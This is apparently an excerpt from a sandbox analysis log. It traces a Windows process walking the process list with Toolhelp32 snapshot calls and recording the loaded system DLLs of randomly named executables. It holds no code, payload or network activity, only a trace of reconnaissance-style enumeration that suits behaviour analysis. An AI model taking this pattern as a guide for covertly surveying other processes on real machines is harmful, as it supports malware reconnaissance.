	[0106.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 24
	[0106.756] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.756] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.756] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.757] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.757] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.758] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.758] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.767] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.767] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.768] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.768] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.769] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.769] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.770] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.770] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.770] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.771] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.771] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.772] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.772] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.773] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.773] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.774] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.774] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.775] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.775] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.775] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.776] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sechost.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.776] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\MSCTF.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.777] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSCTF.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSCTF.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.777] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 1
	[0106.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\dwmapi.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.778] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dwmapi.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dwmapi.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.778] Module32NextW (hSnapshot=0x880, lpme=0x20af280) returned 0
	[0106.779] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ranger_tu_community.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ranger_tu_community.exe", lpUsedDefaultChar=0x0) returned 24
	[0106.779] Process32NextW (in: hSnapshot=0x7e4, lppe=0x20af710 | out: lppe=0x20af710*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x514, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x84c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eddie_cholesterol_reprint.exe")) returned 1
	[0106.780] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x514) returned 0x884
	[0106.787] Module32FirstW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.788] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.788] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.789] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.790] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.791] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.792] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.792] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.793] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.794] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.795] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.796] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.796] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.797] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.798] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.799] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.799] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.814] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.815] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 0
	[0106.816] Module32FirstW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Java\\eddie_cholesterol_reprint.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Java\\eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 52
	[0106.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eddie_cholesterol_reprint.exe", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eddie_cholesterol_reprint.exe", lpUsedDefaultChar=0x0) returned 30
	[0106.817] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\ntdll.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.817] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ntdll.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ntdll.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.818] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 33
	[0106.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNEL32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNEL32.DLL", lpUsedDefaultChar=0x0) returned 13
	[0106.818] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 35
	[0106.819] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="KERNELBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KERNELBASE.dll", lpUsedDefaultChar=0x0) returned 15
	[0106.819] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\apphelp.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.820] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="apphelp.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="apphelp.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.820] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\USER32.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.821] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="USER32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USER32.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.821] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\GDI32.dll", lpUsedDefaultChar=0x0) returned 30
	[0106.822] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GDI32.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GDI32.dll", lpUsedDefaultChar=0x0) returned 10
	[0106.822] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\IMM32.DLL", lpUsedDefaultChar=0x0) returned 30
	[0106.823] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IMM32.DLL", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IMM32.DLL", lpUsedDefaultChar=0x0) returned 10
	[0106.823] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\system32\\uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\system32\\uxtheme.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.824] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="uxtheme.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uxtheme.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.824] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\msvcrt.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcrt.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcrt.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.825] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\combase.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.825] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="combase.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="combase.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.825] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\RPCRT4.dll", lpUsedDefaultChar=0x0) returned 31
	[0106.826] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="RPCRT4.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RPCRT4.dll", lpUsedDefaultChar=0x0) returned 11
	[0106.826] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\SspiCli.dll", lpUsedDefaultChar=0x0) returned 32
	[0106.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SspiCli.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SspiCli.dll", lpUsedDefaultChar=0x0) returned 12
	[0106.827] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 34
	[0106.828] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CRYPTBASE.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CRYPTBASE.dll", lpUsedDefaultChar=0x0) returned 14
	[0106.828] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 41
	[0106.829] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bcryptPrimitives.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bcryptPrimitives.dll", lpUsedDefaultChar=0x0) returned 21
	[0106.829] Module32NextW (hSnapshot=0x884, lpme=0x20af280) returned 1
	[0106.830] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Windows\\SYSTEM32\\sechost.dll", cchWideChar=-1, lpMultiByteStr=0x44a96a8, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\SYSTEM32\\sechost.dll", lpUsedDefaultChar=0x0) returned 32
